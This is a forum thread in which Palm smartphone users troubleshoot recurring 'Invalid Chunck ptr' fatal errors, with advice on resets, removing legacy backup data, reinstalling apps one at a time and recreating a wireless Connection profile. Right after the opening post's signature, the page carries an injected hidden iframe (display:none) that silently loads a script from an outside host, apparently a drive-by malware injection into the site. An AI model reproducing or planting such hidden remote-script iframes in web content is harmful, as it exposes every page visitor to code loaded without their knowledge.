+ Reply to Thread

Thread: Fatal Errors

Fatal Errors

Got the phone about a week ago, finally. I love it except that I keep on getting these fatal errors on a daily basis. Sometimes more than once a day. Every time it happens my voice dialing gets cleared out.

The last one said:

MemoryMgr.c, Line: 4475, Invalid Chunck ptr

Any ideas?

Thanks for the help.

Joe<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    welcome...
    first off.. did you sync this over from an old palm? if so, that could be a major cauyse of your resets...

also, some hacks and 3rd party applications have caused some grief to other users. searching the board would bring uyp some discussions...

i would do a cold boot and instal one app at a time to find out if any one of them are causing the issue...

I'm getting the same error, and am going to do a hard reset. Some legacy stuff from my m505 must be carrying over, I guess. I was wondering if anyone had any tips before doing a hard reset, though. I'm probably going to just go ahead and do it (and pray I can restore my data from PC!), but I bet a lot of folk on here would be interested in a "do this before resetting" checklist. :p

I have had similar problems and have reloaded one application at a time. Just a personal theory, but I think some icons for datbk5 may be causing an issue. Again, just a theory.

If a previous device has corrupted your new phone then a hard reset is the only answer.

Personally, I always pull out the back up folder from my user folder and hotsync just my addressbook etc.

Then i manually install 3rd party apps after i verify everything works.

Its the cleanest way of doing it. I view it like upgrading Windows. I always have issues unless i reformat and do a fresh install.
    I wasn't here
    You don't know me

so all we really need to do is remove the backup folder, and it will synch only the default palm stuff? (address book, memo's, todo's, etc...)?

Because I read we had to delete saved_prefs.prc and all kinds of other things

All of that stuff is in the back up folder
    I wasn't here
    You don't know me

Administrator
    Originally posted by I'm not here
    If a previous device has corrupted your new phone then a hard reset is the only answer.

Personally, I always pull out the back up folder from my user folder and hotsync just my addressbook etc.

Then i manually install 3rd party apps after i verify everything works.

Its the cleanest way of doing it. I view it like upgrading Windows. I always have issues unless i reformat and do a fresh install.
    sound advice!! this is the best way to see what programs/hacks (if any) are causing the problems. and yes everything is in the backup folder.. if you do a cold boot and then just resync, you will put everything back on that you just deleted, so manual install is the best way (and just simply sync your addy book only).

thee is also an archive folder in the desktop that keeps things in it also...

make sure you have the latest desktop 4.1! :UpThum

Re: Fatal Errors

Originally posted by sduser
    Got the phone about a week ago, finally. I love it except that I keep on getting these fatal errors on a daily basis. Sometimes more than once a day. Every time it happens my voice dialing gets cleared out.

The last one said:

MemoryMgr.c, Line: 4475, Invalid Chunck ptr

Any ideas?

Thanks for the help.

Joe
    After I upgraded my MZ and SZ, I was getting this fatal exception error whenever I disconnected from a network connection. It turned out to be a bad connection definitions file. This may be what you are experiencing. Try this...

Go into prefs pda/Connection and create a new Connection (give it any name you wish). Set the parameters as follows:
    Connect to: Modem
    Via: Wireless
    Dialing: TouchTone
    Volume: Low

Then go into prefs pda/Network and select the new Connection you just created as your Connection. Make sure that all of the other Network options are set correctly (based on the type of Network connection you are using).

It solved my fatal exception error. Hopefully it will solve yours as well.

By-the-way, alanb should be given all the credit for recognizing the problem and coming up with the correct solution...

Good luck!
    Dave

Interestingly enough, when I got my phone, it didn't have the Wireless connection present -- I had to manually add it. When I hard-reset my phone, it was there. Anyway, I haven't had any fatal errors yet, so removing all that legacy stuff (just removed everything in the Backup dir) really did help. They should put that in with the "remove SavedPreferences.prc" sheet. :p